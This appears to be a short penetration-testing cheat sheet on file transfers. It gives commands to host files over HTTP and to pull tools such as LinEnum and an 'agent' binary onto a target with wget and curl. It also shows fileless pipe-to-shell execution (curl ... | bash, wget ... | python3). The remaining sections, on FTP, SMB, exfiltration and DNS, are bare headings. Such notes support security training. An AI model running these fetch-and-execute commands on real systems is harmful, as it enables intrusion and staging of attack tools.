File Transfers
File Transfer Methods
HTTP
python3 -m http.server 80
ruby -run -e httpd . -p 80Download using wget & cURL
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh
curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
curl -O http://10.10.14.30/agent
curl.exe -O http://10.10.14.30/agent.exe
# Fileless Download
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash
wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3
# Note: Some payloads such as mkfifo write files to disk.FTP
Servers
SCP
Certutil
Powershell
RDP
SMB
NXC
Exfiltration
Outbound Port Connectivity
Via DNS
Last updated
